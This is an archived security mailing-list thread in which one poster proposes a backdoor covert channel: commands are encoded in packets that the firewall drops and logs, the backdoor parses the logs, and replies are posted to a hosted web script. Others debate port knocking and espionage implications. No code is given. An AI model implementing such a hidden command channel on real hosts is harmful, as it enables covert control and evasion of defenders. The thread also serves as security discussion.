Re: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough?
Dear Aditya Deshmukh, AD Aren't these all different versions of portknocking ? All of AD them work untill someone outside can figure out the pattern of AD events - at most I would call this security by obscurity - Leveraged to real portknocking, i.e encrypted payloads (time based) in different SYN, FYN, etc packets to different ports, you can't easily get the pattern. Thus it leverages the protection over a level that can be seen as security though obscurity. That said you competely ignore that the Port 22 if open is not a security hole itself. By hiding it you protect yourself from possible threads. AD Trivial to detect but good enough for some low security AD requirements Proof it. -- Thierry Zoller mailto:[EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough?
On Sat, Oct 08, 2005 at 07:20:17AM +0530, Aditya Deshmukh wrote: Aren't these all different versions of portknocking ? All of them work untill someone outside can figure out the pattern of events - at most I would call this security by obscurity - Trivial to detect but good enough for some low security requirements The intention of the case you quoted (opening up the SSH port) is to deter casual portscanners or SSH version scanners. This way, my system is much less likely to be on a list of hosts running SSH servers. After the port is opened up, you get a regular, properly configured, up-to-date SSH daemon. -- Jurjen Oskam ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough?
I myself use this method to open up the SSH port for a particular IP address. When you try to open a particular URL on my website, you get a 404 because that document doesn't exist. The webserver logs this. A script in the background sees in the log that this happened, and opens up port 22 to the IP address which requested the non-existant URL. Aren't these all different versions of portknocking ? All of them work untill someone outside can figure out the pattern of events - at most I would call this security by obscurity - Trivial to detect but good enough for some low security requirements ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough?
bit noisy i think -Original Message- From: PASTOR ADRIAN [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Date: Thu, 6 Oct 2005 10:06:24 +0100 Subject: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough? Sometime ago I thought of the following idea for a covert channel. Although the idea of covert channels is *not* new at all, I couldn't find anything in Google related to the following method of implementing a covert channel. The scenario is the following. The victim is a host with a host-level firewall which is blocking *all* incoming traffic. Somehow the attacker still needs to communicate with a backdoor planted in this host. Use a reverse shell and job done, you might say. Actually, there is another way which I thought would be more creative (IMHO). It works like this: the backdoor enables logging in the host-level firewall for all dropped packets, say Windows XP SP2 Firewall. Then the backdoor receives commands from the attacker by interpreting the properties of the dropped packets which were logged by the firewall. In other words, the backdoor is constantly reading the logs and parsing commands which were sent by the attacker embedded in packets which are being dropped (but logged) by the firewall. attacker sends packets - packets are dropped by firewall - packets properties are captured in logs - backdoor reads logs and finds encoded commands - commands are executed Now, for the way the backdoor would reply back to the victim is really up to you. One method that comes to my mind is by posting the responses to a PHP script which is located in some free-hosting webpage. The attacker would then access this webpage. Please, if you know anything related to backdoors intercepting commands from log files send me some links. Ideas, comments and flames are more than welcome :-) . Regards, pagvac (Adrian Pastor) Earth, SOLAR SYSTEM www.adrianpv.com www.ikwt.com (In Knowledge We Trust) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough?
-Original Message- I bring this up because the logs generated by the firewall do not necessarily reside only on the device that received the sender's packets. With lots of organizations working on centralizing log events so that they can correlate findings from different platforms, the ability to control the content of portions of log messages (say, for example, the source address reported in a syslog message indicating a dropped packet) could provide a vector for communicating to highly trusted systems to which one has no direct network access. The problem with this type of hiding-in-plain-sight covert channel is that it is subject to modification between sender and recipient, in this specific case making the victim the man in the middle. An aware victim could quickly become an attacker. The malware applications of this are moderately interesting but the implications of this type of communication model in espionage are extremely interesting. All sorts of implications and impacts (for instance, a double agent might intentionally use this type of communication because it's easily intercepted and modified). I would guess that if there is a book on covert channels for spies out there, this is in the chapter of things NOT to do. PaulM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
